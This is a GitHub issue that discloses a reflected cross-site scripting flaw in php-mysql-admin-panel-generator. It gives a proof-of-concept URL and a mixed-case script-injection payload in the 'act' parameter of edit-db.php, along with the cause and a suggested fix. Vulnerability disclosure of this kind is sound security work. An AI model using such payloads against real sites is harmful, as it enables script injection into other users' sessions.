Skip to content

Cross-Site Scripting (XSS) - Security Issue  #19

Open
@s7safe

Description

Affected software : php-mysql-admin-panel-generator

Version : N/A

Type of vulnerability : XSS (Cross-Site Scripting)

Author : s7safe

Description:
php-mysql-admin-panel-generator is susceptible to cross-site scripting attacks, allowing malicious users to inject code into web pages, and other users will be affected when viewing web pages .

login the system
图片

PoC :
turn to http://192.168.146.130/generated/mysql2022-03-26_02-49/edit-db.php?act=%22%3E%3CScRiPt%3Ealert(%22xss%22)%3C%2FsCrIpT%3E

payload:"><ScRiPt>alert("xss")<%2FsCrIpT>

Successful

图片

Reason:
Failure to filter or escape special characters leads to vulnerabilities

How to fix :
escape special characters or filter it .

by s7safe

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions